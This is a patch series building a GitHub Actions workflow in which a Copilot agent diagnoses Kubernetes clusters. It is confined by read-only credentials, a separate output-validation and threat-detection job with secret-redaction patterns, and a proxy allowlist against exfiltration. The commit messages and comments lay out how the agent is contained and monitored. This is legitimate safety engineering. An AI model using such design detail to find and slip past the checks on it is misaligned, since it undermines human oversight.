From 58cec0659b2474d4c75b79fa1d51e485423ff2fd Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 15:47:54 -0400 Subject: [PATCH 1/7] feat: cluster-doctor with safe-outputs pattern Refactored workflow that splits into three phases: 1. Gather - has Azure OIDC creds, collects K8s diagnostics 2. Analyze - AI agent with read-only perms, produces JSON artifact 3. Apply - validates/sanitizes/applies via safe-outputs-action The agent never holds write tokens or cloud credentials. Uses microsoftgbb/safe-outputs-action@v1 for the output gate. Added as a separate workflow file (.safe-outputs.yml) alongside the original for comparison. The original can be removed once the refactored version is validated. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...ot.trigger-cluster-doctor.safe-outputs.yml | 261 ++++++++++++++++++ 1 file changed, 261 insertions(+) create mode 100644 .github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml new file mode 100644 index 0000000..de01bab --- /dev/null +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -0,0 +1,261 @@ +name: "Cluster Doctor (Safe Outputs)" + +# Refactored to use the three-phase pattern: +# 1. Parse & Gather (has cloud creds, no AI write access) +# 2. Analyze (AI agent with read-only access, produces safe-outputs JSON) +# 3. Apply (deterministic, validates + sanitizes + applies via safe-outputs-action) +# +# See: https://github.com/microsoftgbb/safe-outputs-action + +on: + workflow_dispatch: + repository_dispatch: + types: [cluster-doctor-trigger] + issues: + types: [labeled, opened] + +permissions: + contents: read + +jobs: + # ────────────────────────────────────────────────────────── + # Phase 1: Parse issue + gather cluster diagnostics + # Has cloud credentials but NO AI agent running here. + # ────────────────────────────────────────────────────────── + gather: + if: | + github.event_name == 'workflow_dispatch' || + github.event_name == 'repository_dispatch' || + github.event.label.name == 'cluster-doctor' || + (github.event.action == 'opened' && contains(github.event.issue.labels.*.name, 'cluster-doctor')) + environment: copilot + runs-on: ubuntu-latest + permissions: + id-token: write # Azure OIDC + contents: read + issues: read + outputs: + issue_number: ${{ steps.get-issue.outputs.issue_number }} + resource_group: ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} + cluster_name: ${{ steps.cluster-info.outputs.CLUSTER_NAME }} + + steps: + - name: Determine issue number + id: get-issue + run: | + if [ "${{ github.event_name }}" = "repository_dispatch" ]; then + echo "issue_number=${{ github.event.client_payload.issue_number }}" >> $GITHUB_OUTPUT + else + echo "issue_number=${{ github.event.issue.number }}" >> $GITHUB_OUTPUT + fi + + - uses: actions/checkout@v5 + with: + fetch-depth: 0 + + - name: Install GitHub Copilot CLI + run: | + curl -fsSL https://gh.io/copilot-install | bash + + - name: Parse cluster info from issue body + id: cluster-info + env: + GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + run: | + export ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" + export REPOSITORY="${{ github.repository }}" + PROMPT=$(envsubst < .github/prompts/parse-cluster-info.md) + + COPILOT_OUTPUT=$(copilot -p "$PROMPT" \ + --agent "cluster-doctor" \ + --additional-mcp-config @'.copilot/mcp-config.json' \ + --allow-all-tools 2>&1) + + RESOURCE_GROUP=$(echo "$COPILOT_OUTPUT" | grep -oP 'RESOURCE_GROUP=\K[^\s]+' | head -1) + CLUSTER_NAME=$(echo "$COPILOT_OUTPUT" | grep -oP 'CLUSTER_NAME=\K[^\s]+' | head -1) + + if [ -z "$RESOURCE_GROUP" ] || [ -z "$CLUSTER_NAME" ]; then + echo "ERROR: Could not parse cluster info" + echo "$COPILOT_OUTPUT" + exit 1 + fi + + echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> $GITHUB_OUTPUT + echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT + + - name: Azure CLI Login + uses: azure/login@v2 + with: + client-id: ${{ secrets.ARM_CLIENT_ID }} + tenant-id: ${{ secrets.ARM_TENANT_ID }} + subscription-id: ${{ secrets.ARM_SUBSCRIPTION_ID }} + + - name: Get AKS credentials + run: | + az aks install-cli + az aks get-credentials \ + --resource-group ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} \ + --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ + --overwrite-existing + + - name: Gather cluster diagnostics + run: | + mkdir -p diagnostics + kubectl get events -A -o json > diagnostics/events.json + kubectl get pods -A -o json > diagnostics/pods.json + kubectl get nodes -o json > diagnostics/nodes.json + kubectl top nodes --no-headers > diagnostics/node-metrics.txt 2>/dev/null || true + kubectl top pods -A --no-headers > diagnostics/pod-metrics.txt 2>/dev/null || true + kubectl get hpa -A -o json > diagnostics/hpa.json 2>/dev/null || true + kubectl get deployments -A -o json > diagnostics/deployments.json + kubectl get services -A -o json > diagnostics/services.json + echo "Diagnostics gathered:" + ls -la diagnostics/ + + - name: Post work started comment + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ + --body "🤖 **Cluster Doctor is on the case!** + + Diagnostics gathered. AI analysis in progress. + + 🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" + + - uses: actions/upload-artifact@v4 + with: + name: cluster-diagnostics + path: diagnostics/ + retention-days: 1 + + # ────────────────────────────────────────────────────────── + # Phase 2: AI agent analyzes diagnostics + # Read-only permissions. No cloud creds. No GitHub write token. + # Agent produces structured safe-outputs JSON. + # ────────────────────────────────────────────────────────── + analyze: + needs: gather + runs-on: ubuntu-latest + permissions: + contents: read + + steps: + - uses: actions/checkout@v5 + + - uses: actions/download-artifact@v4 + with: + name: cluster-diagnostics + path: diagnostics/ + + - name: Install GitHub Copilot CLI + run: | + curl -fsSL https://gh.io/copilot-install | bash + + - name: AI analysis + env: + GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + run: | + ISSUE_NUMBER="${{ needs.gather.outputs.issue_number }}" + CLUSTER_NAME="${{ needs.gather.outputs.cluster_name }}" + RG="${{ needs.gather.outputs.resource_group }}" + + cat > /tmp/analysis-prompt.md << PROMPT + You are the Cluster Doctor analyzing AKS cluster "${CLUSTER_NAME}" in resource group "${RG}". + + Analyze the Kubernetes diagnostics in the diagnostics/ directory. + The files contain JSON exports of cluster state: events, pods, nodes, HPAs, deployments, services, and resource metrics. + + Produce your findings as a JSON file at agent-output.json following this exact schema: + + { + "version": "1", + "actions": [ + { + "type": "issue_comment", + "issue_number": ${ISSUE_NUMBER}, + "body": "## Cluster Doctor Report\n\n" + } + ] + } + + Your analysis should include: + - Cluster health summary (nodes, pods, resource pressure) + - Any issues found (CrashLoopBackOff, OOMKilled, pending pods, etc.) + - Root cause analysis where possible + - Recommended remediation steps + + If you find issues that need code/config changes, add a create_pull_request action: + { + "type": "create_pull_request", + "title": "[cluster-doctor] ", + "body": "", + "head": "cluster-doctor/fix-", + "files": { "path/to/file": "content" } + } + + IMPORTANT: + - Write ONLY the JSON file. No other output. + - Do NOT include any secrets, tokens, or connection strings in your output. + - Use the [cluster-doctor] prefix on all issue and PR titles. + PROMPT + + copilot -p "$(cat /tmp/analysis-prompt.md)" \ + --agent "cluster-doctor" + + # Verify output exists and is valid JSON + if [ ! -f agent-output.json ]; then + echo "ERROR: Agent did not produce agent-output.json" + exit 1 + fi + python3 -c "import json; json.load(open('agent-output.json'))" || { + echo "ERROR: agent-output.json is not valid JSON" + exit 1 + } + echo "Agent output:" + cat agent-output.json | python3 -m json.tool + + - uses: actions/upload-artifact@v4 + with: + name: agent-output + path: agent-output.json + retention-days: 1 + + # ────────────────────────────────────────────────────────── + # Phase 3: Validate, sanitize, and apply agent output + # Has write permissions but NO AI agent running here. + # ────────────────────────────────────────────────────────── + apply: + needs: [gather, analyze] + runs-on: ubuntu-latest + permissions: + issues: write + contents: write + pull-requests: write + + steps: + - uses: actions/download-artifact@v4 + with: + name: agent-output + + - name: Install Copilot CLI (for threat detection) + run: | + curl -fsSL https://gh.io/copilot-install | bash + + - name: Safe Outputs Gate + uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-issues: 0 + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation,remediation" + threat-detection: true + custom-secret-patterns: | + 10\.0\.\d+\.\d+ + aks-[a-z0-9]{8,} + DefaultEndpointsProtocol + env: + GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} From c572d2b7e82bbd0017256d072033a55ee5a85f52 Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 19:03:14 -0400 Subject: [PATCH 2/7] refactor: give agent read-only cluster access instead of static dumps The previous version gathered diagnostics deterministically and passed static JSON files to the agent - making it a log parser, not a diagnostician. The agent couldn't follow threads. Now: the agent runs in the same job as the cluster connection, with read-only access to K8s via AKS MCP and GitHub via GitHub MCP. It can freely explore (check pod logs, inspect HPA config, trace dependency chains) but cannot mutate anything. Security boundary is maintained through: - Scoped RBAC (Azure: Monitoring Reader, K8s: read-only ClusterRole) - No GitHub write token in the agent step - Writes still gated through safe-outputs-action in Phase 2 Two jobs instead of three: 1. Diagnose (cloud creds + agent + read-only MCP access) 2. Apply (write perms + safe-outputs validation, no agent) Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...ot.trigger-cluster-doctor.safe-outputs.yml | 202 ++++++++++-------- 1 file changed, 109 insertions(+), 93 deletions(-) diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index de01bab..1ece5e7 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -1,9 +1,14 @@ name: "Cluster Doctor (Safe Outputs)" -# Refactored to use the three-phase pattern: -# 1. Parse & Gather (has cloud creds, no AI write access) -# 2. Analyze (AI agent with read-only access, produces safe-outputs JSON) -# 3. Apply (deterministic, validates + sanitizes + applies via safe-outputs-action) +# Two-phase pattern with read-only agent access: +# 1. Diagnose - Agent has read-only K8s + Azure access via scoped RBAC, +# plus read-only GitHub MCP. Produces safe-outputs JSON artifact. +# 2. Apply - Deterministic job validates, sanitizes, and applies the +# agent's proposed actions via safe-outputs-action. +# +# The agent can freely explore the cluster (follow threads, check logs, +# inspect resources) but cannot mutate anything. All writes go through +# the gated apply phase. # # See: https://github.com/microsoftgbb/safe-outputs-action @@ -19,10 +24,21 @@ permissions: jobs: # ────────────────────────────────────────────────────────── - # Phase 1: Parse issue + gather cluster diagnostics - # Has cloud credentials but NO AI agent running here. + # Phase 1: Diagnose + # + # The agent gets: + # - Read-only K8s access (scoped ClusterRole via AKS MCP server) + # - Read-only Azure access (OIDC, scoped to Monitoring Reader) + # - Read-only GitHub MCP (can read issues, not write them) + # - No GitHub write token + # + # The agent can follow threads freely - check pod logs when it + # sees OOMKills, inspect HPA config when it sees scaling issues, + # look at node allocatable when it sees pending pods, etc. + # + # Output: structured safe-outputs JSON artifact # ────────────────────────────────────────────────────────── - gather: + diagnose: if: | github.event_name == 'workflow_dispatch' || github.event_name == 'repository_dispatch' || @@ -31,13 +47,11 @@ jobs: environment: copilot runs-on: ubuntu-latest permissions: - id-token: write # Azure OIDC + id-token: write # Azure OIDC (scoped to read-only role) contents: read - issues: read + issues: read # Read issues for context, not write outputs: issue_number: ${{ steps.get-issue.outputs.issue_number }} - resource_group: ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} - cluster_name: ${{ steps.cluster-info.outputs.CLUSTER_NAME }} steps: - name: Determine issue number @@ -84,6 +98,20 @@ jobs: echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> $GITHUB_OUTPUT echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT + # ── Establish read-only cluster access ── + # + # The Azure identity used here should be scoped to: + # - Azure Kubernetes Service Cluster User Role (read-only) + # - Monitoring Reader (for metrics) + # + # The AKS MCP server should use a K8s ClusterRole scoped to: + # - pods, events, nodes, services, deployments: get, list + # - pods/log: get + # - NO secrets, NO configmaps (or namespace-scoped) + # - NO create, update, delete, patch verbs + # + # See README for the recommended ClusterRole definition. + - name: Azure CLI Login uses: azure/login@v2 with: @@ -91,7 +119,7 @@ jobs: tenant-id: ${{ secrets.ARM_TENANT_ID }} subscription-id: ${{ secrets.ARM_SUBSCRIPTION_ID }} - - name: Get AKS credentials + - name: Connect to AKS cluster run: | az aks install-cli az aks get-credentials \ @@ -99,19 +127,13 @@ jobs: --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ --overwrite-existing - - name: Gather cluster diagnostics - run: | - mkdir -p diagnostics - kubectl get events -A -o json > diagnostics/events.json - kubectl get pods -A -o json > diagnostics/pods.json - kubectl get nodes -o json > diagnostics/nodes.json - kubectl top nodes --no-headers > diagnostics/node-metrics.txt 2>/dev/null || true - kubectl top pods -A --no-headers > diagnostics/pod-metrics.txt 2>/dev/null || true - kubectl get hpa -A -o json > diagnostics/hpa.json 2>/dev/null || true - kubectl get deployments -A -o json > diagnostics/deployments.json - kubectl get services -A -o json > diagnostics/services.json - echo "Diagnostics gathered:" - ls -la diagnostics/ + echo "Verifying cluster access..." + kubectl cluster-info + + # Start port-forward to AKS MCP server + # The MCP server provides read-only K8s access to the agent + kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & + sleep 3 - name: Post work started comment env: @@ -120,91 +142,84 @@ jobs: gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ --body "🤖 **Cluster Doctor is on the case!** - Diagnostics gathered. AI analysis in progress. + Connected to cluster. AI diagnosis in progress - the agent is + exploring the cluster to identify and trace issues. 🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" - - uses: actions/upload-artifact@v4 - with: - name: cluster-diagnostics - path: diagnostics/ - retention-days: 1 - - # ────────────────────────────────────────────────────────── - # Phase 2: AI agent analyzes diagnostics - # Read-only permissions. No cloud creds. No GitHub write token. - # Agent produces structured safe-outputs JSON. - # ────────────────────────────────────────────────────────── - analyze: - needs: gather - runs-on: ubuntu-latest - permissions: - contents: read - - steps: - - uses: actions/checkout@v5 - - - uses: actions/download-artifact@v4 - with: - name: cluster-diagnostics - path: diagnostics/ - - - name: Install GitHub Copilot CLI - run: | - curl -fsSL https://gh.io/copilot-install | bash - - - name: AI analysis + # ── Agent runs with read-only access ── + # + # The agent can freely: + # - Query any K8s resource via AKS MCP (read-only) + # - Read issue context via GitHub MCP (read-only) + # - Follow diagnostic threads (logs, events, resource chains) + # + # The agent CANNOT: + # - Write to GitHub (no write token provided) + # - Mutate K8s resources (read-only ClusterRole) + # - Access secrets (excluded from ClusterRole) + # - Reach external networks (if network policy is applied) + + - name: AI diagnosis env: + GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} run: | - ISSUE_NUMBER="${{ needs.gather.outputs.issue_number }}" - CLUSTER_NAME="${{ needs.gather.outputs.cluster_name }}" - RG="${{ needs.gather.outputs.resource_group }}" + ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" + CLUSTER_NAME="${{ steps.cluster-info.outputs.CLUSTER_NAME }}" + RG="${{ steps.cluster-info.outputs.RESOURCE_GROUP }}" - cat > /tmp/analysis-prompt.md << PROMPT - You are the Cluster Doctor analyzing AKS cluster "${CLUSTER_NAME}" in resource group "${RG}". + export PROMPT="You are the Cluster Doctor diagnosing AKS cluster '${CLUSTER_NAME}' in resource group '${RG}'. - Analyze the Kubernetes diagnostics in the diagnostics/ directory. - The files contain JSON exports of cluster state: events, pods, nodes, HPAs, deployments, services, and resource metrics. + Use the AKS MCP server to explore the cluster. You have read-only access to all Kubernetes resources. + Use the GitHub MCP server to read issue #${ISSUE_NUMBER} in ${{ github.repository }} for context. - Produce your findings as a JSON file at agent-output.json following this exact schema: + INVESTIGATE FREELY: + - Start broad (cluster health, node status, pod states) + - Follow threads when you find issues (e.g., OOMKilled -> check resource limits -> check HPA -> check node capacity) + - Check pod logs for crash details + - Trace the dependency chain (service -> deployment -> pods -> events) + - Look at recent events for warning patterns + + When your investigation is complete, produce your findings as a JSON file at agent-output.json following this schema: { - "version": "1", - "actions": [ + \"version\": \"1\", + \"actions\": [ { - "type": "issue_comment", - "issue_number": ${ISSUE_NUMBER}, - "body": "## Cluster Doctor Report\n\n" + \"type\": \"issue_comment\", + \"issue_number\": ${ISSUE_NUMBER}, + \"body\": \"## Cluster Doctor Report\n\n\" } ] } - Your analysis should include: - - Cluster health summary (nodes, pods, resource pressure) - - Any issues found (CrashLoopBackOff, OOMKilled, pending pods, etc.) - - Root cause analysis where possible - - Recommended remediation steps + Your report should include: + - Investigation path (what you checked and why) + - Findings with evidence (specific pods, events, metrics) + - Root cause analysis + - Recommended remediation steps with specific commands or config changes - If you find issues that need code/config changes, add a create_pull_request action: + If you identify config/code changes, add a create_pull_request action: { - "type": "create_pull_request", - "title": "[cluster-doctor] ", - "body": "", - "head": "cluster-doctor/fix-", - "files": { "path/to/file": "content" } + \"type\": \"create_pull_request\", + \"title\": \"[cluster-doctor] \", + \"body\": \"\", + \"head\": \"cluster-doctor/fix-\", + \"files\": { \"path/to/file\": \"full file content\" } } - IMPORTANT: - - Write ONLY the JSON file. No other output. - - Do NOT include any secrets, tokens, or connection strings in your output. - - Use the [cluster-doctor] prefix on all issue and PR titles. - PROMPT + RULES: + - Write ONLY the agent-output.json file. No other files. + - Do NOT include secrets, tokens, connection strings, or internal IPs in your output. + - Use [cluster-doctor] prefix on all titles." - copilot -p "$(cat /tmp/analysis-prompt.md)" \ - --agent "cluster-doctor" + copilot -p "$PROMPT" \ + --agent "cluster-doctor" \ + --additional-mcp-config @'.copilot/mcp-config.json' \ + --allow-all-tools - # Verify output exists and is valid JSON + # Validate output if [ ! -f agent-output.json ]; then echo "ERROR: Agent did not produce agent-output.json" exit 1 @@ -213,8 +228,7 @@ jobs: echo "ERROR: agent-output.json is not valid JSON" exit 1 } - echo "Agent output:" - cat agent-output.json | python3 -m json.tool + echo "Agent output produced successfully" - uses: actions/upload-artifact@v4 with: @@ -223,11 +237,13 @@ jobs: retention-days: 1 # ────────────────────────────────────────────────────────── - # Phase 3: Validate, sanitize, and apply agent output - # Has write permissions but NO AI agent running here. + # Phase 2: Validate, sanitize, and apply + # + # No AI agent. No cluster access. No cloud creds. + # Mechanically applies the validated, sanitized output. # ────────────────────────────────────────────────────────── apply: - needs: [gather, analyze] + needs: diagnose runs-on: ubuntu-latest permissions: issues: write From b5fc123ff49ca0e782a2df5715d18af38023b47c Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 19:24:40 -0400 Subject: [PATCH 3/7] refactor: 3-job pipeline - diagnose / scan / apply Separates concerns cleanly across three jobs: 1. Diagnose - agent has live read-only cluster + GitHub MCP access, can follow diagnostic threads freely, produces JSON artifact 2. Scan - validates constraints, sanitizes secrets, runs AI threat detection via Copilot CLI. Dry-run mode: blocks if anything fails but does not write. No creds of any kind. 3. Apply - has GitHub write token only. Mechanically applies the validated, sanitized output. No agent, no cluster creds. Each job has exactly one concern and minimum permissions. The scan job acts as a circuit breaker between diagnosis and action. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...ot.trigger-cluster-doctor.safe-outputs.yml | 158 +++++++++--------- 1 file changed, 76 insertions(+), 82 deletions(-) diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index 1ece5e7..af91ba3 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -1,14 +1,11 @@ name: "Cluster Doctor (Safe Outputs)" -# Two-phase pattern with read-only agent access: -# 1. Diagnose - Agent has read-only K8s + Azure access via scoped RBAC, -# plus read-only GitHub MCP. Produces safe-outputs JSON artifact. -# 2. Apply - Deterministic job validates, sanitizes, and applies the -# agent's proposed actions via safe-outputs-action. +# Three-phase pattern: +# 1. Diagnose - Agent explores cluster freely (read-only K8s + GitHub MCP) +# 2. Scan - Validate constraints, sanitize secrets, AI threat detection +# 3. Apply - Deterministic write to GitHub (issues, PRs) # -# The agent can freely explore the cluster (follow threads, check logs, -# inspect resources) but cannot mutate anything. All writes go through -# the gated apply phase. +# Each job has exactly one concern and the minimum permissions for it. # # See: https://github.com/microsoftgbb/safe-outputs-action @@ -24,19 +21,14 @@ permissions: jobs: # ────────────────────────────────────────────────────────── - # Phase 1: Diagnose + # Job 1: Diagnose # - # The agent gets: - # - Read-only K8s access (scoped ClusterRole via AKS MCP server) - # - Read-only Azure access (OIDC, scoped to Monitoring Reader) - # - Read-only GitHub MCP (can read issues, not write them) - # - No GitHub write token + # Has: Azure OIDC (read-only), K8s MCP (read-only), GitHub MCP (read-only) + # Does NOT have: GitHub write token # - # The agent can follow threads freely - check pod logs when it - # sees OOMKills, inspect HPA config when it sees scaling issues, - # look at node allocatable when it sees pending pods, etc. - # - # Output: structured safe-outputs JSON artifact + # The agent can freely explore the cluster - check pod logs, + # inspect HPA config, trace dependency chains, etc. + # Produces a structured safe-outputs JSON artifact. # ────────────────────────────────────────────────────────── diagnose: if: | @@ -49,7 +41,7 @@ jobs: permissions: id-token: write # Azure OIDC (scoped to read-only role) contents: read - issues: read # Read issues for context, not write + issues: read outputs: issue_number: ${{ steps.get-issue.outputs.issue_number }} @@ -98,20 +90,6 @@ jobs: echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> $GITHUB_OUTPUT echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT - # ── Establish read-only cluster access ── - # - # The Azure identity used here should be scoped to: - # - Azure Kubernetes Service Cluster User Role (read-only) - # - Monitoring Reader (for metrics) - # - # The AKS MCP server should use a K8s ClusterRole scoped to: - # - pods, events, nodes, services, deployments: get, list - # - pods/log: get - # - NO secrets, NO configmaps (or namespace-scoped) - # - NO create, update, delete, patch verbs - # - # See README for the recommended ClusterRole definition. - - name: Azure CLI Login uses: azure/login@v2 with: @@ -126,39 +104,21 @@ jobs: --resource-group ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} \ --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ --overwrite-existing - - echo "Verifying cluster access..." kubectl cluster-info - - # Start port-forward to AKS MCP server - # The MCP server provides read-only K8s access to the agent kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & sleep 3 - - name: Post work started comment - env: - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - run: | - gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ - --body "🤖 **Cluster Doctor is on the case!** - - Connected to cluster. AI diagnosis in progress - the agent is - exploring the cluster to identify and trace issues. - - 🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" - - # ── Agent runs with read-only access ── + # ── Agent explores the cluster freely ── # - # The agent can freely: - # - Query any K8s resource via AKS MCP (read-only) - # - Read issue context via GitHub MCP (read-only) - # - Follow diagnostic threads (logs, events, resource chains) + # CAN: query K8s resources, read pod logs, check events, read issue context + # CANNOT: write to GitHub, mutate K8s, access K8s secrets, reach external networks # - # The agent CANNOT: - # - Write to GitHub (no write token provided) - # - Mutate K8s resources (read-only ClusterRole) - # - Access secrets (excluded from ClusterRole) - # - Reach external networks (if network policy is applied) + # Recommended K8s ClusterRole for the AKS MCP service account: + # pods, events, nodes, services, namespaces: get, list + # pods/log: get + # deployments, replicasets, daemonsets, statefulsets: get, list + # horizontalpodautoscalers: get, list + # NO secrets, NO configmaps (or namespace-scoped), NO write verbs - name: AI diagnosis env: @@ -189,18 +149,12 @@ jobs: { \"type\": \"issue_comment\", \"issue_number\": ${ISSUE_NUMBER}, - \"body\": \"## Cluster Doctor Report\n\n\" + \"body\": \"## Cluster Doctor Report\n\n\" } ] } - Your report should include: - - Investigation path (what you checked and why) - - Findings with evidence (specific pods, events, metrics) - - Root cause analysis - - Recommended remediation steps with specific commands or config changes - - If you identify config/code changes, add a create_pull_request action: + If you identify config/code changes that would fix the issue, add a create_pull_request action: { \"type\": \"create_pull_request\", \"title\": \"[cluster-doctor] \", @@ -210,16 +164,15 @@ jobs: } RULES: - - Write ONLY the agent-output.json file. No other files. - - Do NOT include secrets, tokens, connection strings, or internal IPs in your output. - - Use [cluster-doctor] prefix on all titles." + - Write ONLY the agent-output.json file + - Do NOT include secrets, tokens, connection strings, or internal IPs in your output + - Use [cluster-doctor] prefix on all titles" copilot -p "$PROMPT" \ --agent "cluster-doctor" \ --additional-mcp-config @'.copilot/mcp-config.json' \ --allow-all-tools - # Validate output if [ ! -f agent-output.json ]; then echo "ERROR: Agent did not produce agent-output.json" exit 1 @@ -228,7 +181,6 @@ jobs: echo "ERROR: agent-output.json is not valid JSON" exit 1 } - echo "Agent output produced successfully" - uses: actions/upload-artifact@v4 with: @@ -237,18 +189,19 @@ jobs: retention-days: 1 # ────────────────────────────────────────────────────────── - # Phase 2: Validate, sanitize, and apply + # Job 2: Scan # - # No AI agent. No cluster access. No cloud creds. - # Mechanically applies the validated, sanitized output. + # Has: nothing - no cloud creds, no write tokens, no cluster access + # Just the agent's output artifact and the safe-outputs validator. + # + # Validates constraints, sanitizes secrets, runs AI threat detection. + # If anything fails, the workflow stops here - nothing gets written. # ────────────────────────────────────────────────────────── - apply: + scan: needs: diagnose runs-on: ubuntu-latest permissions: - issues: write - contents: write - pull-requests: write + contents: read steps: - uses: actions/download-artifact@v4 @@ -259,7 +212,7 @@ jobs: run: | curl -fsSL https://gh.io/copilot-install | bash - - name: Safe Outputs Gate + - name: Validate, sanitize, and scan uses: microsoftgbb/safe-outputs-action@v1 with: artifact-path: agent-output.json @@ -269,9 +222,50 @@ jobs: title-prefix: "[cluster-doctor] " allowed-labels: "cluster-doctor,bug,investigation,remediation" threat-detection: true + dry-run: true custom-secret-patterns: | 10\.0\.\d+\.\d+ aks-[a-z0-9]{8,} DefaultEndpointsProtocol env: GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + + # Re-upload the (potentially sanitized) output for the apply job + - uses: actions/upload-artifact@v4 + with: + name: scanned-output + path: agent-output.json + retention-days: 1 + overwrite: true + + # ────────────────────────────────────────────────────────── + # Job 3: Apply + # + # Has: GitHub write token (issues, contents, pull-requests) + # Does NOT have: AI agent, cloud creds, cluster access + # + # Mechanically applies the validated, sanitized output. + # No decisions made here - just execution. + # ────────────────────────────────────────────────────────── + apply: + needs: [diagnose, scan] + runs-on: ubuntu-latest + permissions: + issues: write + contents: write + pull-requests: write + + steps: + - uses: actions/download-artifact@v4 + with: + name: scanned-output + + - name: Apply safe outputs + uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-issues: 0 + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation,remediation" From fe7efe577fabe26be04552e1f273283a38a1f413 Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 20:24:53 -0400 Subject: [PATCH 4/7] feat: container isolation + network firewall for agent Defense-in-depth matching gh-aw's Agent Workflow Firewall pattern: 1. Agent runs inside a Docker container (not on bare runner) 2. Container sits on an internal Docker network (--internal) 3. All HTTP/HTTPS traffic routes through a Squid proxy 4. Proxy enforces a domain allowlist: - api.githubcopilot.com (model API) - api.github.com (GitHub MCP) - *.azmk8s.io (K8s API for port-forward) - login.microsoftonline.com (Azure AD) - management.azure.com (Azure ARM) - (injected dynamically) 5. Everything else is blocked at the network level 6. Proxy access log provides full audit trail Scoped credentials are still passed to the container (read-only K8s RBAC, read-only Azure roles) because the agent needs them to do its job. The firewall prevents exfiltration of data the agent reads to unauthorized destinations. New files: - .github/containers/agent/Dockerfile (Copilot CLI + kubectl) - .github/containers/proxy/squid.conf (domain allowlist) - .github/scripts/run-sandboxed-agent.sh (orchestrates containers) Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/containers/agent/Dockerfile | 36 ++++ .github/containers/proxy/squid.conf | 43 +++++ .github/scripts/run-sandboxed-agent.sh | 136 +++++++++++++++ ...ot.trigger-cluster-doctor.safe-outputs.yml | 158 ++++++++++-------- 4 files changed, 301 insertions(+), 72 deletions(-) create mode 100644 .github/containers/agent/Dockerfile create mode 100644 .github/containers/proxy/squid.conf create mode 100755 .github/scripts/run-sandboxed-agent.sh diff --git a/.github/containers/agent/Dockerfile b/.github/containers/agent/Dockerfile new file mode 100644 index 0000000..cc00b74 --- /dev/null +++ b/.github/containers/agent/Dockerfile @@ -0,0 +1,36 @@ +FROM ubuntu:24.04 + +# Avoid interactive prompts +ENV DEBIAN_FRONTEND=noninteractive + +RUN apt-get update && apt-get install -y --no-install-recommends \ + ca-certificates \ + curl \ + jq \ + python3 \ + apt-transport-https \ + gnupg \ + && rm -rf /var/lib/apt/lists/* + +# Install kubectl +RUN curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.31/deb/Release.key | gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg \ + && echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.31/deb/ /' > /etc/apt/sources.list.d/kubernetes.list \ + && apt-get update && apt-get install -y kubectl \ + && rm -rf /var/lib/apt/lists/* + +# Install kubelogin +RUN curl -fsSL 